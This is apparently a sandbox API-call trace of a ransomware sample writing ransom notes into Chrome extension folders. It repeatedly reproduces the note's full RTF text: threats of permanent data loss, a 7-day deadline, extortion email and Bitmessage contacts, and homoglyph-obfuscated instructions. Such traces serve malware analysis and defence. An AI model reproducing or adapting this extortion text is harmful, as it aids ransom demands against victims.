th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nJ\x8eú\x10\x11\x13\x15ÔÒÅ3'g\x18ÂÉ=)ͪõ}Ó\x14", lpUsedDefaultChar=0x0) returned 8717 [0273.332] WriteFile (in: hFile=0x294, lpBuffer=0x1ef9408*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef9408*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0273.333] CloseHandle (hObject=0x294) returned 1 [0273.333] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\#readme_eman#.rtf")) returned 0xffffffff [0273.333] GetLastError () returned 0x2 [0273.333] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0273.333] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0273.333] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0273.334] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef9408, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl 